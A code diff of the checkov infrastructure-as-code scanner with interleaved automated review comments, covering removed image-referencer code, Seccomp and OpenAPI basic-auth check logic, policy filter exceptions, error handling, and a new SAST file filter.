@@ -66,7 +59,11 @@ def _parse_file(f: str, file_content: str | None = None) -> \ if not file_content: with open(f, 'r') as f_obj: - file_content = f_obj.read() + try: + file_content = f_obj.read() + except Exception as e: + logging.warning(f'Fail to read file {f}. error: {e}') + return None if all(map(is_schema_valid, yaml.load_all(file_content, Loader=loader.SafeLineLoaderGhaSchema))): # nosec return entity_schema @@ -117,43 +114,8 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - graph_connector=None, - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions, - definitions_raw=self.definitions_raw - ) - - if image_report: - if isinstance(report, list): - return [*report, image_report] - return [report, image_report] - return report - def extract_images( - self, graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions or not definitions_raw: - return images - - for file, config in definitions.items(): - _config = force_dict(config) or {} - manager = GithubActionsImageReferencerManager(workflow_config=_config, file_path=file, - workflow_line_numbers=definitions_raw[file]) - images.extend(manager.extract_images_from_workflow()) - - return images - def populate_metadata_dict(self) -> None: if isinstance(self.definitions, dict): # populate gha metadata dict 
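Review bot: The new `try` wraps only `f_obj.read()`, but `open(f, 'r')` on the line above can fail with the same `OSError` family (missing file, permission denied), and a `UnicodeDecodeError` from the implicit locale encoding is the most likely read failure; moving the `with` inside the `try` and narrowing `except Exception` to `except (OSError, UnicodeDecodeError)` covers the realistic cases without masking programming errors. Passing `encoding="utf-8"` to `open` also makes the result independent of the host locale. The message `Fail to read file` would read better as `Failed to read file`. `_parse_file` starts outside the hunk.
```python
    if not file_content:
        try:
            with open(f, 'r', encoding="utf-8") as f_obj:
                file_content = f_obj.read()
        except (OSError, UnicodeDecodeError) as e:
            logging.warning(f'Failed to read file {f}. error: {e}')
            return None
    # … unchanged: schema validation and return …
```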
diff --git a/checkov/gitlab_ci/image_referencer/manager.py b/checkov/gitlab_ci/image_referencer/manager.py deleted file mode 100644 index 28abfd40ab1..00000000000 --- a/checkov/gitlab_ci/image_referencer/manager.py +++ /dev/null @@ -1,13 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager -from checkov.gitlab_ci.image_referencer.provider import GitlabCiProvider - - -class GitlabCiImageReferencerManager(WorkflowImageReferencerManager): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - super().__init__(workflow_config, file_path, provider) diff --git a/checkov/gitlab_ci/image_referencer/provider.py b/checkov/gitlab_ci/image_referencer/provider.py deleted file mode 100644 index 743ae81197f..00000000000 --- a/checkov/gitlab_ci/image_referencer/provider.py +++ /dev/null 
@@ -1,62 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.images.image_referencer import Image -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider -from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive - - -class GitlabCiProvider(WorkflowImageReferencerProvider): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - super().__init__(workflow_config, file_path) - self.supported_keys = ("image", "services") - - def extract_images_from_workflow(self) -> list[Image]: - images = [] - for job_object in self.workflow_config.values(): - if isinstance(job_object, dict): - start_line, end_line = GitlabCiProvider._get_start_end_lines(job_object) - for key, subjob in job_object.items(): - if key in self.supported_keys: - image_name = "" - if isinstance(subjob, dict): - if 'name' not in subjob: - continue - start_line, end_line = GitlabCiProvider._get_start_end_lines(subjob) - image_name = subjob['name'] - elif isinstance(subjob, str): - image_name = subjob - elif isinstance(subjob, list): - for service in subjob: - if isinstance(service, dict): - start_line, end_line = GitlabCiProvider._get_start_end_lines(service) - image_name = service['name'] - elif isinstance(service, str): - image_name = service - if image_name: - image_obj = Image( - file_path=self.file_path, - name=image_name, - start_line=start_line, - end_line=end_line, - related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, - key='', - start_line=start_line, - end_line=end_line) - ) - images.append(image_obj) - image_name = "" - if image_name: - image_obj = Image( - file_path=self.file_path, - name=image_name, - start_line=start_line, - end_line=end_line, - related_resource_id=generate_resource_key_recursive(conf=self.workflow_config, - key='', start_line=start_line, - end_line=end_line) - ) - images.append(image_obj) - return list(set(images)) 
diff --git a/checkov/gitlab_ci/runner.py b/checkov/gitlab_ci/runner.py index a58acd9d179..d680383cbb4 100644 --- a/checkov/gitlab_ci/runner.py +++ b/checkov/gitlab_ci/runner.py @@ -1,27 +1,21 @@ from __future__ import annotations -import os from typing import TYPE_CHECKING, Any +from checkov.common.bridgecrew.check_type import CheckType from checkov.common.output.report import Report from checkov.common.util.type_forcers import force_dict +from checkov.gitlab_ci.checks.registry import registry from checkov.gitlab_ci.common.resource_id_utils import generate_resource_key_recursive - from checkov.runner_filter import RunnerFilter - -from checkov.common.images.image_referencer import Image, ImageReferencerMixin -from checkov.common.bridgecrew.check_type import CheckType -from checkov.gitlab_ci.checks.registry import registry -from checkov.gitlab_ci.image_referencer.manager import GitlabCiImageReferencerManager from checkov.yaml_doc.runner import Runner as YamlRunner if TYPE_CHECKING: from checkov.common.checks.base_check_registry import BaseCheckRegistry from collections.abc import Iterable - from networkx import DiGraph -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.GITLAB_CI # noqa: CCE003 # a static attribute def require_external_checks(self) -> bool: 
@@ -69,38 +63,4 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - graph_connector=None, - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions - ) - - if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list - return report - - def extract_images( - self, - graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions: - return images - - for file, config in definitions.items(): - if isinstance(config, list): - continue - - manager = GitlabCiImageReferencerManager(workflow_config=config, file_path=file) - images.extend(manager.extract_images_from_workflow()) - - return images diff --git a/checkov/kubernetes/checks/resource/k8s/Seccomp.py b/checkov/kubernetes/checks/resource/k8s/Seccomp.py index cf6745e1ef7..a6ac1486d82 100644 --- a/checkov/kubernetes/checks/resource/k8s/Seccomp.py +++ b/checkov/kubernetes/checks/resource/k8s/Seccomp.py 
@@ -52,21 +52,43 @@ def scan_spec_conf(self, conf: dict[str, Any]) -> CheckResult: if security_profile: return CheckResult.PASSED if security_profile == 'RuntimeDefault' else CheckResult.FAILED + if "spec" in conf and isinstance(conf["spec"], dict): + template_spec = conf["spec"].get("template", {}) + if isinstance(template_spec, dict): + template_spec = template_spec.get("spec", {}) + if isinstance(template_spec, dict): + containers = template_spec.get("containers") + if containers: + containers = force_list(containers) + num_containers = len(containers) + passed_containers = 0 + for container in containers: + security_profile = find_in_dict(container, "securityContext/seccompProfile/type") + if security_profile: + if security_profile == "RuntimeDefault": + passed_containers += 1 + else: + return CheckResult.FAILED + if passed_containers == num_containers: + return CheckResult.PASSED + metadata = find_in_dict(input_dict=conf, key_path="spec/template/metadata") if not metadata and "metadata" in conf: metadata = conf["metadata"] elif conf['kind'] == 'CronJob': inner_template = find_in_dict(input_dict=conf, key_path="spec/jobTemplate/spec/template") if inner_template and isinstance(inner_template, dict): - if "metadata" in inner_template: - metadata = inner_template["metadata"] - elif "spec" in inner_template: + if "spec" in inner_template: inner_spec = inner_template["spec"] if "metadata" in inner_spec: metadata = inner_spec["metadata"] elif "securityContext" in inner_spec: security_profile = inner_spec["securityContext"].get("seccompProfile", {}).get("type") - return CheckResult.PASSED if security_profile == 'RuntimeDefault' else CheckResult.FAILED + if security_profile == 'RuntimeDefault': + return CheckResult.PASSED + if "metadata" in inner_template: + metadata = inner_template["metadata"] + else: inner_metadata = find_in_dict(input_dict=conf, key_path="spec/template/metadata") metadata = inner_metadata if inner_metadata else metadata 
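Review bot: In the CronJob branch the replacement `if security_profile == 'RuntimeDefault': return CheckResult.PASSED` drops the FAILED return, so an explicitly non-default profile in the pod-level `securityContext.seccompProfile.type` (e.g. `Unconfined`) now falls through to the metadata lookup and can pass on a deprecated seccomp annotation, even though the securityContext field is what the kubelet honours; keep `return CheckResult.FAILED` on the else path, as the unchanged pod-level check at the top of the hunk does. The new per-container loop only walks `containers`; `initContainers` run under the same pod and should be counted too, otherwise a workload whose init container sets `Unconfined` while its app containers are `RuntimeDefault` passes. The loop also reuses the outer `security_profile` name, so after the loop it holds the last container's value rather than the pod-level one, which is worth a local name like `container_profile`. scan_spec_conf continues outside the hunk.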
diff --git a/checkov/main.py b/checkov/main.py index 159686b0203..b2c5a00e047 100755 --- a/checkov/main.py +++ b/checkov/main.py @@ -31,7 +31,7 @@ from checkov.cloudformation.runner import Runner as cfn_runner from checkov.common.bridgecrew.bc_source import SourceTypes, BCSourceType, get_source_type, SourceType from checkov.common.bridgecrew.check_type import checkov_runners, CheckType -from checkov.common.bridgecrew.platform_errors import ModuleNotEnabledError +from checkov.common.bridgecrew.platform_errors import ModuleNotEnabledError, PlatformConnectionError from checkov.common.bridgecrew.integration_features.features.custom_policies_integration import \ integration as custom_policies_integration from checkov.common.bridgecrew.integration_features.features.licensing_integration import \ @@ -55,7 +55,6 @@ from checkov.common.util import prompt from checkov.common.util.banner import banner as checkov_banner, tool as checkov_tool from checkov.common.util.config_utils import get_default_config_paths -from checkov.common.util.consts import CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 from checkov.common.util.ext_argument_parser import ExtArgumentParser, flatten_csv from checkov.common.util.runner_dependency_handler import RunnerDependencyHandler from checkov.common.util.type_forcers import convert_str_to_bool @@ -77,7 +76,6 @@ from checkov.sast.report import SastData, SastReport from checkov.sast.runner import Runner as sast_runner from checkov.sca_image.runner import Runner as sca_image_runner -from checkov.sca_package.runner import Runner as sca_package_runner from checkov.sca_package_2.runner import Runner as sca_package_runner_2 from checkov.secrets.runner import Runner as secrets_runner from checkov.serverless.runner import Runner as sls_runner @@ -122,6 +120,7 @@ bicep_runner(), openapi_runner(), sca_image_runner(), + sca_package_runner_2(), argo_workflows_runner(), circleci_pipelines_runner(), azure_pipelines_runner(), 
@@ -191,9 +190,9 @@ def normalize_config(self) -> None: if self.config.bc_api_key and not self.config.repo_id and not self.config.list: self.parser.error('--repo-id is required when using a platform API key') - if self.config.policy_metadata_filter and not (self.config.bc_api_key and self.config.prisma_api_url): + if (self.config.policy_metadata_filter or self.config.policy_metadata_filter_exception) and not (self.config.bc_api_key and self.config.prisma_api_url): logger.warning( - '--policy-metadata-filter flag was used without a Prisma Cloud API key. Policy filtering will be skipped.' + '--policy-metadata-filter or --policy-metadata-filter-exception flag was used without a Prisma Cloud API key. Policy filtering will be skipped.' ) logging.debug('Normalizing --framework') @@ -348,11 +347,6 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ logger.debug('Using --list; setting source to DISABLED') source = SourceTypes[BCSourceType.DISABLED] - if CHECKOV_RUN_SCA_PACKAGE_SCAN_V2: - self.runners.append(sca_package_runner_2()) - else: - self.runners.append(sca_package_runner()) - if outer_registry: runner_registry = outer_registry runner_registry.runner_filter = runner_filter @@ -408,6 +402,8 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ except MaxRetryError: self.exit_run() + except PlatformConnectionError: + self.exit_run() except Exception: if bc_integration.prisma_api_url: message = 'An error occurred setting up the Prisma Cloud platform integration. ' \ 
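Review bot: The new `except PlatformConnectionError: self.exit_run()` exits without recording what failed, while the neighbouring `except Exception` branch builds a message and the handler added later in this diff logs `logging.debug("Exception traceback:", exc_info=True)` before exiting; for parity add at least that debug line here, so a failed platform setup can be diagnosed from verbose output. Whether exit_run() itself prints anything is not visible in this hunk.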
@@ -466,30 +462,28 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ if removed_check_types: logger.warning(f"Following runners won't run as they are not supported for on-premises integrations: {removed_check_types}") - bc_integration.get_prisma_build_policies(self.config.policy_metadata_filter) + bc_integration.get_prisma_build_policies(self.config.policy_metadata_filter, self.config.policy_metadata_filter_exception) # set config to make it usable inside the integration features integration_feature_registry.config = self.config integration_feature_registry.run_pre_scan() + # assign policies suppression to runner_filter policy_level_suppression = suppressions_integration.get_policy_level_suppressions() - bc_cloned_checks = custom_policies_integration.bc_cloned_checks - runner_filter.bc_cloned_checks = bc_cloned_checks + runner_filter.bc_cloned_checks = custom_policies_integration.bc_cloned_checks custom_policies_integration.policy_level_suppression = list(policy_level_suppression.keys()) + runner_filter.set_suppressed_policies(list(policy_level_suppression.values())) if any(framework in runner_filter.framework for framework in ("all", CheckType.SCA_IMAGE)): # only run image referencer, when sca_image framework is enabled runner_filter.run_image_referencer = licensing_integration.should_run_image_referencer() runner_filter.filtered_policy_ids = policy_metadata_integration.filtered_policy_ids + runner_filter.filtered_exception_policy_ids = policy_metadata_integration.filtered_exception_policy_ids logger.debug(f"Filtered list of policies: {runner_filter.filtered_policy_ids}") + logger.debug(f"Filtered excluded list of policies: {runner_filter.filtered_exception_policy_ids}") runner_filter.excluded_paths = runner_filter.excluded_paths + list(repo_config_integration.skip_paths) - policy_level_suppression = suppressions_integration.get_policy_level_suppressions() - bc_cloned_checks = custom_policies_integration.bc_cloned_checks - 
runner_filter.bc_cloned_checks = bc_cloned_checks - custom_policies_integration.policy_level_suppression = list(policy_level_suppression.keys()) - runner_filter.set_suppressed_policies(list(policy_level_suppression.values())) if self.config.use_enforcement_rules: runner_filter.apply_enforcement_rules(repo_config_integration.code_category_configs) @@ -497,7 +491,8 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ if self.config.list: print_checks(frameworks=self.config.framework, use_bc_ids=self.config.output_bc_ids, include_all_checkov_policies=self.config.include_all_checkov_policies, - filtered_policy_ids=runner_filter.filtered_policy_ids) + filtered_policy_ids=runner_filter.filtered_policy_ids, + filtered_exception_policy_ids=runner_filter.filtered_exception_policy_ids) return None baseline = None @@ -698,9 +693,20 @@ def run(self, banner: str = checkov_banner, tool: str = checkov_tool, source_typ logging.error(m) self.exit_run() return None - except BaseException: + except PlatformConnectionError: + # we don't want to print all of these stack traces in normal output, as these could be user error + # and stack traces look like checkov bugs + logging.debug("Exception traceback:", exc_info=True) + self.exit_run() + return None + except SystemExit: + # calling exit_run from an exception handler causes another exception that is caught here, so we just need to re-exit + self.exit_run() + return None + except BaseException: # noqa: B036 # we need to catch any failure and exit properly logging.error("Exception traceback:", exc_info=True) - raise + self.exit_run() + return None finally: if bc_integration.support_flag_enabled: 
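Review bot: `except SystemExit:` catches every SystemExit raised inside the try body, including one carrying a deliberate exit status, and replaces it with whatever `exit_run()` produces; if the intent is only to absorb the SystemExit that `exit_run()` raises from a nested handler, bind it and re-raise the others, `except SystemExit as e:` / `if e.code == 0: raise` / `self.exit_run()` (assuming exit_run() never exits with 0). The `except BaseException` branch no longer re-raises, so a KeyboardInterrupt during a scan now ends via exit_run() instead of the interpreter's default interrupt exit; a comment stating that this is deliberate would stop the next reviewer from restoring the `raise`. The try statement opens outside the hunk.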
@@ -743,6 +749,10 @@ def get_external_checks_dir(self) -> list[str]: git_getter = GitGetter(url=self.config.external_checks_git[0]) external_checks_dir = [git_getter.get()] atexit.register(shutil.rmtree, str(Path(external_checks_dir[0]).parent)) + if bc_integration.sast_custom_policies: + if not external_checks_dir: + external_checks_dir = [] + external_checks_dir.append(bc_integration.sast_custom_policies) return external_checks_dir def upload_results( diff --git a/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py b/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py index b939c757a11..27ce6745dac 100644 --- a/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py +++ b/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py @@ -26,7 +26,7 @@ def scan_openapi_conf(self, conf: dict[str, Any], entity_type: str) -> tuple[Che for name, security_scheme in security_schemes.items(): if name in self.irrelevant_keys: continue - if isinstance(security_scheme, dict) and (security_scheme.get('type') == 'http' or security_scheme.get('scheme') == 'basic'): + if isinstance(security_scheme, dict) and (security_scheme.get('type') == 'http' and security_scheme.get('scheme') == 'basic'): return CheckResult.FAILED, security_scheme if not isinstance(paths, dict): diff --git a/checkov/policies_3d/output.py b/checkov/policies_3d/output.py index a08faf5f553..116dc75cd7a 100644 --- a/checkov/policies_3d/output.py +++ b/checkov/policies_3d/output.py @@ -2,6 +2,7 @@ import itertools import logging +import sys from collections import defaultdict from typing import List, Dict, Any 
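Review bot: `bc_integration.sast_custom_policies` is appended to the same `external_checks_dir` list that is handed to every runner, not only the SAST one, so each framework's registry will also walk that directory looking for checks it can load; if the directory holds SAST-specific policy files this is at best wasted parsing and at worst a mis-registered check for another framework — confirm, or hand the path to the SAST registry directly. A short comment, `# platform-provided SAST custom policies are loaded as an additional external checks dir`, would also explain why a downloaded path is mixed with user-supplied ones. get_external_checks_dir starts outside the hunk.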
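Review bot: With the condition tightened to `type == 'http' and scheme == 'basic'`, the `scheme` comparison alone now decides the result, and it is case-sensitive while HTTP authentication scheme names are case-insensitive (RFC 7235), so a document declaring `scheme: Basic` no longer fails; compare `str(security_scheme.get('scheme', '')).lower() == 'basic'`. The `or` → `and` change also stops flagging other `http` schemes (e.g. bearer), which is the intent of a cleartext-credentials check but deserves a line in the check's description. scan_openapi_conf continues outside the hunk.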
@@ -242,6 +243,11 @@ def create_iac_violations_overview_table_part( table_width: int, column_width: int, resource_violation_details_map: Dict[str, Dict[str, Any]] ) -> List[str]: iac_table_lines: List[str] = [] + + # on python 3.12 and above, the columns are smaller, need to make them wider in order to have consistency. + if sys.version_info >= (3, 12): + table_width += 3 + iac_table = PrettyTable( min_table_width=table_width, max_table_width=table_width diff --git a/checkov/runner_filter.py b/checkov/runner_filter.py index 5be3e12805f..83911694936 100644 --- a/checkov/runner_filter.py +++ b/checkov/runner_filter.py @@ -46,6 +46,7 @@ def __init__( skip_cve_package: Optional[List[str]] = None, use_enforcement_rules: bool = False, filtered_policy_ids: Optional[List[str]] = None, + filtered_exception_policy_ids: Optional[List[str]] = None, show_progress_bar: Optional[bool] = True, run_image_referencer: bool = False, enable_secret_scan_all_files: bool = False, @@ -108,6 +109,10 @@ def __init__( self.skip_checks.append(val) self.include_all_checkov_policies = include_all_checkov_policies + if not framework or "all" in framework: + self.framework_flag_values = [] + else: + self.framework_flag_values = framework self.framework: "Iterable[str]" = framework if framework else ["all"] if skip_framework: @@ -128,6 +133,7 @@ def __init__( self.var_files = var_files self.skip_cve_package = skip_cve_package self.filtered_policy_ids = filtered_policy_ids or [] + self.filtered_exception_policy_ids = filtered_exception_policy_ids or [] self.run_image_referencer = run_image_referencer self.enable_secret_scan_all_files = enable_secret_scan_all_files self.block_list_secret_scan = block_list_secret_scan 
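Review bot: `self.framework_flag_values = framework` stores the caller's list object itself rather than a copy, unlike the other list-valued attributes in `__init__` that are built with `or []`; `list(framework)` decouples it, and an annotation (`self.framework_flag_values: List[str]`) would match the `self.framework: "Iterable[str]"` line right after it. What the attribute is for is not stated anywhere in the hunk; a one-line comment, `# the --framework values as given, empty when the flag was omitted or 'all'`, would explain why it differs from `self.framework`.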
@@ -225,6 +231,7 @@ def should_run_check( implicit_run = not self.checks and not check_threshold is_external = RunnerFilter.is_external_check(check_id) is_policy_filtered = self.is_policy_filtered(check_id) + is_policy_exception = self.is_policy_exception(check_id) # True if this check is present in the allow list, or if there is no allow list # this is not necessarily the return value (need to apply other filters) should_run_check = ( @@ -243,6 +250,10 @@ def should_run_check( if not is_policy_filtered: logging.debug(f'not is_policy_filtered {check_id}: should_run_check = False') should_run_check = False + # If a policy is present in the list of filter exception policies, it should not be run - implicitly or explicitly. + if is_policy_exception: + logging.debug(f'is_policy_exception {check_id}: should_run_check = False') + should_run_check = False skip_severity = severity and skip_check_threshold and severity.level <= skip_check_threshold.level explicit_skip = self.skip_checks and self.check_matches(check_id, bc_check_id, self.skip_checks) @@ -329,6 +340,11 @@ def is_policy_filtered(self, check_id: str) -> bool: return True return check_id in self.filtered_policy_ids + def is_policy_exception(self, check_id: str) -> bool: + if not self.filtered_exception_policy_ids: + return False + return check_id in self.filtered_exception_policy_ids + def to_dict(self) -> Dict[str, Any]: result: Dict[str, Any] = {} for key, value in self.__dict__.items(): @@ -364,6 +380,7 @@ def from_dict(obj: Dict[str, Any]) -> RunnerFilter: if use_enforcement_rules is None: use_enforcement_rules = False filtered_policy_ids = obj.get('filtered_policy_ids') + filtered_exception_policy_ids = obj.get('filtered_exception_policy_ids') show_progress_bar = obj.get('show_progress_bar') if show_progress_bar is None: show_progress_bar = True 
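Review bot: `is_policy_exception` guards against an empty list before the membership test, but `check_id in []` is already False, so the method reduces to `return check_id in self.filtered_exception_policy_ids`; the early return is only meaningful in `is_policy_filtered`, where an empty list means "no allow list". Keeping the two methods visibly different avoids a reader assuming they share the same empty-list semantics, and a docstring on the new one, `"""True when the platform explicitly excluded this policy from running."""`, would make the asymmetry explicit.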
@@ -375,13 +392,14 @@ def from_dict(obj: Dict[str, Any]) -> RunnerFilter: runner_filter = RunnerFilter(framework, checks, skip_checks, include_all_checkov_policies, download_external_modules, external_modules_download_path, evaluate_variables, runners, skip_framework, excluded_paths, all_external, var_files, - skip_cve_package, use_enforcement_rules, filtered_policy_ids, show_progress_bar, - run_image_referencer, enable_secret_scan_all_files, block_list_secret_scan) + skip_cve_package, use_enforcement_rules, filtered_policy_ids, filtered_exception_policy_ids, + show_progress_bar, run_image_referencer, enable_secret_scan_all_files, block_list_secret_scan) return runner_filter - def set_suppressed_policies(self, policy_level_suppressions: List[str]) -> None: + def set_suppressed_policies(self, policy_level_suppressions: List[List[str]]) -> None: logging.debug(f"Received the following policy-level suppressions, that will be skipped from running: {policy_level_suppressions}") - self.suppressed_policies = policy_level_suppressions + # flatten + self.suppressed_policies = [suppression for suppression_list in policy_level_suppressions for suppression in suppression_list] @staticmethod def get_sast_languages(frameworks: Optional[List[str]], skip_framework: Optional[List[str]]) -> Set[SastLanguages]: diff --git a/checkov/sast/checks_infra/base_registry.py b/checkov/sast/checks_infra/base_registry.py index 9897c7e93cf..8f4db5a4c9e 100644 --- a/checkov/sast/checks_infra/base_registry.py +++ b/checkov/sast/checks_infra/base_registry.py 
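Review bot: `set_suppressed_policies` flattens with `for suppression in suppression_list`, so if any caller still passes the previous `List[str]` shape the comprehension silently splits each policy id into single characters instead of failing; a guard such as `[s for item in policy_level_suppressions for s in ([item] if isinstance(item, str) else item)]` keeps both shapes working. `from_dict` passes the constructor arguments positionally and the new `filtered_exception_policy_ids` was inserted in the middle of that list, which is exactly how a silent argument shift happens; switching the call to keyword arguments makes the next insertion safe. from_dict starts outside the hunk.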
@@ -6,16 +6,13 @@ from typing import List, Any, Optional, Dict from checkov.common.bridgecrew.check_type import CheckType -from checkov.common.bridgecrew.wrapper import CDK_FRAMEWORK_PREFIX + from checkov.common.checks.base_check_registry import BaseCheckRegistry from checkov.runner_filter import RunnerFilter logger = logging.getLogger(__name__) -CDK_CHECKS_DIR_PATH = f'{os.getcwd()}/checkov/{CDK_FRAMEWORK_PREFIX}/checks' - - class Registry(BaseCheckRegistry): def __init__(self, checks_dir: str | None = None) -> None: super().__init__(report_type=CheckType.SAST) diff --git a/checkov/sast/engines/files_filter_manager.py b/checkov/sast/engines/files_filter_manager.py new file mode 100644 index 00000000000..71d64484d23 --- /dev/null +++ b/checkov/sast/engines/files_filter_manager.py 
@@ -0,0 +1,101 @@ +import logging +import os +import json +from typing import Set, List, Dict + +from checkov.common.runners.base_runner import IGNORE_HIDDEN_DIRECTORY_ENV, ignored_directories +from checkov.common.sast.consts import SastLanguages + + +class FilesFilterManager: + def __init__(self, source_codes: List[str], languages: Set[SastLanguages]) -> None: + self.source_codes: List[str] = source_codes + self.languages: Set[SastLanguages] = languages + + def get_files_to_filter(self) -> List[str]: + files_to_filter: List[str] = [] + try: + if SastLanguages.JAVASCRIPT in self.languages: + files_to_filter += self._get_js_files_to_filter() + files_to_filter += self._filter_hidden_files() + except Exception as e: + logging.debug(f'Error filtering js files generated by ts: {e}') + return files_to_filter + + def _get_js_files_to_filter(self) -> List[str]: + js_files_to_filter = [] + + for path in self.source_codes: + js_files: List[Dict[str, str]] = [] + ts_files: List[Dict[str, str]] = [] + tsconfig_files: List[Dict[str, str]] = [] + for (dirpath, _, filenames) in os.walk(path): + if '/node_modules/' in dirpath: + continue + for filename in filenames: + if filename.endswith('.ts'): + ts_files.append({'full_path': os.sep.join([dirpath, filename]), 'dir': dirpath, 'name': filename}) + if filename.endswith('tsconfig.json'): + tsconfig_files.append({'full_path': os.sep.join([dirpath, filename]), 'dir': dirpath, 'name': filename}) + if filename.endswith('.js'): + js_files.append({'full_path': os.sep.join([dirpath, filename]), 'dir': dirpath, 'name': filename}) + + js_files_to_filter += FilesFilterManager._filter_by_tsconfig(tsconfig_files) + js_files_to_filter += FilesFilterManager._filter_direct_build_js(js_files, ts_files, js_files_to_filter) + + return js_files_to_filter + + @staticmethod + def _filter_direct_build_js(js_files: List[Dict[str, str]], ts_files: List[Dict[str, str]], filtered_by_tsconfig: List[str]) -> List[str]: + js_files_to_filter: List[str] = [] + 
for js_file in js_files: + js_dir = js_file.get('dir', '') + already_skipped = False + for filtered_by_tsconfig_path in filtered_by_tsconfig: + if js_dir.startswith(filtered_by_tsconfig_path): + already_skipped = True + break + if already_skipped: + continue + for ts_file in ts_files: + if ts_file.get('dir', '') == js_dir and ts_file.get('name', '')[:-3] == js_file.get('name', '')[:-3]: + js_files_to_filter.append(js_file.get('full_path', '')) + break + return js_files_to_filter + + @staticmethod + def _filter_by_tsconfig(tsconfig_files: List[Dict[str, str]]) -> List[str]: + js_files_to_filter: List[str] = [] + for tsconfig_file in tsconfig_files: + with open(tsconfig_file.get('full_path', '')) as fp: + config = json.load(fp) + out_dir = config.get('compilerOptions', {}).get('outDir') + out_file = config.get('compilerOptions', {}).get('outFile') + if out_dir: + build_dir = out_dir + elif out_file: + build_dir = out_file + else: + build_dir = tsconfig_file.get('dir') + + # relative path + if not build_dir.startswith('/'): + build_path = os.path.abspath(tsconfig_file.get('dir', '') + '/' + build_dir) + # absolute path + else: + build_path = build_dir + js_files_to_filter.append(build_path) + return js_files_to_filter + + def _filter_hidden_files(self) -> List[str]: + # consider ENV variable to ignore hidden directories (CKV_IGNORED_DIRECTORIES, CKV_IGNORE_HIDDEN_DIRECTORIES) + paths_to_filter: List[str] = ignored_directories.copy() + if not IGNORE_HIDDEN_DIRECTORY_ENV: + return paths_to_filter + for path in self.source_codes: + for (_dirpath, dirs, _) in os.walk(path): + for directory in dirs: + if directory.startswith('.'): + paths_to_filter.append(directory) + + return paths_to_filter diff --git a/checkov/sast/engines/prisma_engine.py b/checkov/sast/engines/prisma_engine.py index 6e8a10a0637..7d0b0c4c0eb 100644 --- a/checkov/sast/engines/prisma_engine.py +++ b/checkov/sast/engines/prisma_engine.py 
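Review bot: `_filter_by_tsconfig` falls back to `build_dir = tsconfig_file.get('dir')` when `compilerOptions` has neither `outDir` nor `outFile`, so a tsconfig.json without an explicit output directory puts its whole directory into the skip list, and in `get_reports` that list becomes the engine's `skip_path`, which removes the project's own sources from the scan; when no output directory is configured the entry should be skipped rather than widened to the project root. `if '/node_modules/' in dirpath:` misses files directly inside `node_modules` (that dirpath has no trailing separator); `'node_modules' in dirpath.split(os.sep)` matches every level. `json.load` on a tsconfig.json that uses comments or trailing commas raises, and the single `except Exception` in `get_files_to_filter` then discards the hidden-directory filtering as well, logging only at debug level; catch per file inside the tsconfig loop. `js_dir.startswith(filtered_by_tsconfig_path)` is a bare prefix test, so `dist` also matches `dist-legacy`; compare against the path with a trailing `os.sep` or use `os.path.commonpath`.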
@@ -14,9 +14,9 @@ from checkov.common.bridgecrew.check_type import CheckType from checkov.common.bridgecrew.platform_integration import bc_integration +from checkov.common.bridgecrew.integration_features.features.policy_metadata_integration import integration as policy_metadata_integration from checkov.common.bridgecrew.platform_key import bridgecrew_dir from checkov.common.bridgecrew.severities import get_severity, Severity, Severities, BcSeverities -from checkov.common.bridgecrew.wrapper import CDK_FRAMEWORK_PREFIX from checkov.common.models.enums import CheckResult from checkov.common.output.report import Report from checkov.common.sast.consts import CDKLanguages, SastLanguages @@ -28,10 +28,12 @@ from checkov.sast.engines.base_engine import SastEngine from checkov.sast.prisma_models.library_input import LibraryInput from checkov.sast.prisma_models.policies_list import SastPolicies +from checkov.common.sast.consts import CDK_FRAMEWORK_PREFIX from checkov.common.sast.report_types import PrismaReport, RuleMatch, create_empty_report from checkov.sast.record import SastRecord from checkov.sast.report import SastReport from checkov.cdk.report import CDKReport +from checkov.sast.engines.files_filter_manager import FilesFilterManager logger = logging.getLogger(__name__) @@ -47,6 +49,7 @@ def __init__(self) -> None: self.check_type = CheckType.SAST self.prisma_sast_dir_path = Path(bridgecrew_dir) / "sast" self.sast_platform_base_path = "api/v1/sast" + self.enable_inline_suppressions = os.getenv("ENABLE_SAST_INLINE_SUPPRESSIONS", False) 